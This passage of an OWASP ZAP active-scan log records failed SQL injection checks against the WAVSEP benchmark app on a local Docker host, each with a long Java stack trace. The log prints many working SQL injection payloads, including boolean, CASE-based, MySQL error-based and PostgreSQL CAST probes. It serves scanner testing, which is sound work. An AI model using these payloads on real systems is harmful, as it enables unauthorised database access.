org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 8922339 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [/wavsep/active/LFI/LFI-FalsePositives-GET/validfile1.jsp AND 3174=3174-- OGAf] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/LFI/LFI-FalsePositives-GET/validfile1.jsp AND 3174=3174-- OGAf at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:720) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 8922340 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [/wavsep/active/LFI/LFI-FalsePositives-GET/validfile1.jsp AND 2419=9826-- DuUq] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/LFI/LFI-FalsePositives-GET/validfile1.jsp AND 2419=9826-- DuUq at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:737) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 8922343 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [(SELECT (CASE WHEN (9508=7088) THEN 9508 ELSE 9508*(SELECT 9508 FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/LFI/LFI-FalsePositives-GET/(SELECT (CASE WHEN (9508=7088) THEN 9508 ELSE 9508*(SELECT 9508 FROM INFORMATION_SCHEMA.CHARACTER_SETS) END)) at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:706) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 8922345 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [(SELECT (CASE WHEN (7652=7652) THEN 7652 ELSE 7652*(SELECT 7652 FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/LFI/LFI-FalsePositives-GET/(SELECT (CASE WHEN (7652=7652) THEN 7652 ELSE 7652*(SELECT 7652 FROM INFORMATION_SCHEMA.CHARACTER_SETS) END)) at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:720) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 8922347 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [(SELECT (CASE WHEN (9508=7088) THEN 9508 ELSE 9508*(SELECT 9508 FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/LFI/LFI-FalsePositives-GET/(SELECT (CASE WHEN (9508=7088) THEN 9508 ELSE 9508*(SELECT 9508 FROM INFORMATION_SCHEMA.CHARACTER_SETS) END)) at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:737) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 8922353 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [/wavsep/active/LFI/LFI-FalsePositives-GET/validfile1.jsp) AND (SELECT 9698 FROM(SELECT COUNT(*),CONCAT(0x3a7861623a,(SELECT (ELT(9698=9698,1))),0x3a7561713a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND (1190=1190] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/LFI/LFI-FalsePositives-GET/validfile1.jsp) AND (SELECT 9698 FROM(SELECT COUNT(*),CONCAT(0x3a7861623a,(SELECT (ELT(9698=9698,1))),0x3a7561713a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND (1190=1190 at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:807) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 8922358 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [/wavsep/active/LFI/LFI-FalsePositives-GET/validfile1.jsp AND (SELECT 9203 FROM(SELECT COUNT(*),CONCAT(0x3a7861623a,(SELECT (ELT(9203=9203,1))),0x3a7561713a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/LFI/LFI-FalsePositives-GET/validfile1.jsp AND (SELECT 9203 FROM(SELECT COUNT(*),CONCAT(0x3a7861623a,(SELECT (ELT(9203=9203,1))),0x3a7561713a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:807) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 8922359 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [/wavsep/active/LFI/LFI-FalsePositives-GET/validfile1.jsp') AND (SELECT 9787 FROM(SELECT COUNT(*),CONCAT(0x3a7861623a,(SELECT (ELT(9787=9787,1))),0x3a7561713a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND ('tTxe'='tTxe] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/LFI/LFI-FalsePositives-GET/validfile1.jsp') AND (SELECT 9787 FROM(SELECT COUNT(*),CONCAT(0x3a7861623a,(SELECT (ELT(9787=9787,1))),0x3a7561713a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND ('tTxe'='tTxe at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:807) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 8922361 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [/wavsep/active/LFI/LFI-FalsePositives-GET/validfile1.jsp' AND (SELECT 1607 FROM(SELECT COUNT(*),CONCAT(0x3a7861623a,(SELECT (ELT(1607=1607,1))),0x3a7561713a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'vizR'='vizR] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/LFI/LFI-FalsePositives-GET/validfile1.jsp' AND (SELECT 1607 FROM(SELECT COUNT(*),CONCAT(0x3a7861623a,(SELECT (ELT(1607=1607,1))),0x3a7561713a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'vizR'='vizR at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:807) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 8922364 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [/wavsep/active/LFI/LFI-FalsePositives-GET/validfile1.jsp%' AND (SELECT 1319 FROM(SELECT COUNT(*),CONCAT(0x3a7861623a,(SELECT (ELT(1319=1319,1))),0x3a7561713a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND '%'='] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/LFI/LFI-FalsePositives-GET/validfile1.jsp%' AND (SELECT 1319 FROM(SELECT COUNT(*),CONCAT(0x3a7861623a,(SELECT (ELT(1319=1319,1))),0x3a7561713a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND '%'=' at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:807) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 8922367 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [/wavsep/active/LFI/LFI-FalsePositives-GET/validfile1.jsp AND (SELECT 9280 FROM(SELECT COUNT(*),CONCAT(0x3a7861623a,(SELECT (ELT(9280=9280,1))),0x3a7561713a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)-- XMZe] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/LFI/LFI-FalsePositives-GET/validfile1.jsp AND (SELECT 9280 FROM(SELECT COUNT(*),CONCAT(0x3a7861623a,(SELECT (ELT(9280=9280,1))),0x3a7561713a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)-- XMZe at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:807) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 8922370 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [/wavsep/active/LFI/LFI-FalsePositives-GET/validfile1.jsp) AND 6604=CAST((CHR(58)||CHR(120)||CHR(97)||CHR(98)||CHR(58))||(SELECT (CASE WHEN (6604=6604) THEN 1 ELSE 0 END))::text||(CHR(58)||CHR(117)||CHR(97)||CHR(113)||CHR(58)) AS NUMERIC) AND (7340=7340] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/LFI/LFI-FalsePositives-GET/validfile1.jsp) AND 6604=CAST((CHR(58)||CHR(120)||CHR(97)||CHR(98)||CHR(58))||(SELECT (CASE WHEN (6604=6604) THEN 1 ELSE 0 END))::text||(CHR(58)||CHR(117)||CHR(97)||CHR(113)||CHR(58)) AS NUMERIC) AND (7340=7340 at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:807) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 8922372 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [/wavsep/active/LFI/LFI-FalsePositives-GET/validfile1.jsp AND 8522=CAST((CHR(58)||CHR(120)||CHR(97)||CHR(98)||CHR(58))||(SELECT (CASE WHEN (8522=8522) THEN 1 ELSE 0 END))::text||(CHR(58)||CHR(117)||CHR(97)||CHR(113)||CHR(58)) AS NUMERIC)] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/LFI/LFI-FalsePositives-GET/validfile1.jsp AND 8522=CAST((CHR(58)||CHR(120)||CHR(97)||CHR(98)||CHR(58))||(SELECT (CASE WHEN (8522=8522) THEN 1 ELSE 0 END))::text||(CHR(58)||CHR(117)||CHR(97)||CHR(113)||CHR(58)) AS NUMERIC) at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at 